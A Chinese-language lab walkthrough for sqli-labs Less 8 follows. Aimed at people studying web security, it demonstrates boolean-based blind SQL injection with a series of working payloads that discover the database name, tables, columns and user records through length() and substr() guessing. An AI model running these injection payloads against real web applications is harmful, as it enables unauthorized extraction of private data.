sqli-labs靶场 less 8

文章目录


sqli-labs靶场

每道题都从以下模板讲解,并且每个步骤都有图片,清晰明了,便于复盘。

sql注入的基本步骤

  • 注入点
  • 注入类型
    • 字符型:判断闭合方式 ('、"、''、"")
    • 数字型
  • 根据实际情况,选择合适的注入方式
  • 获取数据库名,表名,列名,数据

less 8 布尔盲注

数据库名长度-》数据库库名

指定数据库中表的个数-》 表名长度-》 表名

指定表中的字段个数-》 字段长度-》 字段名

指定表中该字段有多少条记录-》 数据长度-》 数据内容

  • 题目类型: 字符型 ' 闭合

id=1和id=1/0 无变化

id=1'不显示You are in

id=1'' id=1''' id=1'''' 并且呈规律性变化

id=1'--+ 正常回显 所以是字符型注入


id=1'--+ 正常回显 所以是字符型注入

通过以上判断注入类型和闭合方式,可以看到页面只呈现真假二个页面,所以适合使用布尔盲注
先构造轮子

id=1' and 1 --+

true页面

id=1' and 0 --+

false页面
对轮子变形

id=1' and length("abcd") = 4 --+

轮子正确

替换轮子
1、判断当前数据库

(1)判断数据库名长度

id=1' and length(database()) =n --+

n表示使用数据库名的长度,对n进行爆破

可见长度为8

(2)猜数据库名

id=1' and substr(database(),1,1)='s' --+

可以看到大小写都盲注成功

数据名是 security

2、判断指定库的所有表

(1)判断当前库有多少个表

id=1' and (select count(table_name) from information_schema.tables where table_schema="security" ) = 4--+


(2)判断指定库中第n个表名最多有几个字母

开始判断第1个表名最多有几个字母

id=1' and length( (select table_name from information_schema.tables where table_schema='security' limit 0,1 ) )=6 --+

判断得到第1个表名有6个字母


(3)猜指定库中第n个表名

id=1' and substr((select table_name from information_schema.tables

where table_schema="security" limit 0,1),1,1)='e' --+

3、判断指定库指定表的字段

(1)判断指定表中有几个字段

id=1' and (select count(column_name) from information_schema.columns where table_schema='security' and table_name='users')=3 --+


(2)判断指定库的指定表中的第n个字段最多有几个字母

id=1' and length((select column_name from information_schema.columns where table_schema=database() and table_name='users' limit 0,1))=2 --+

(3)猜指定表中第n个字段名

id=1' and substr((select column_name from information_schema.columns

where table_schema="security" and table_name='users' limit 0,1),1,1)='i' --+


4、爆破内容

(1)判断内容中有几行数据

id=1' and (select count(username) from users)=13 --+

(2)判断第n行记录最多有几个字母

id=1' and length((select username from users limit 0,1))=4 --+

(3)猜数据内容

id=1' and substr((select username from users limit 0,1),1,1)='D' --+

MySQL数据库,不区分大小写,Dump和DUMP都可以


相关推荐
Macbethad12 小时前
基于TwinCAT的半导体刻蚀设备SCADA管理程序技术方案
运维·网络·数据库
ai_coder_ai12 小时前
编写自动化脚本,在自己后端服务中使用云原生Baas服务进行设备相关操作
数据库·云原生·自动化
小粉粉hhh12 小时前
Node.js(五)——编写接口
前端·javascript·node.js
oradh12 小时前
Oracle DG主备架构的基本维护操作总结
数据库·oracle·架构·dg主备架构的基本维护操作总结
xieliyu.13 小时前
MySQL 六大基础约束详解:NOT NULL/DEFAULT/UNIQUE/ 主键 / 外键 / CHECK
android·数据库·sql·mysql
进击切图仔13 小时前
SAM3 微调标注流水线和 Label Studio
java·服务器·前端
自然 醒13 小时前
前端如何实现在线预览office常见文件功能?
前端·vue.js
肉肉不吃 肉13 小时前
前端调试跨域如何解决
前端·vue.js
JSON_L13 小时前
MongoDB文档关系详解
数据库·mongodb
Liora_Yvonne14 小时前
为什么你写了3年前端还是搭不好一个项目
前端·架构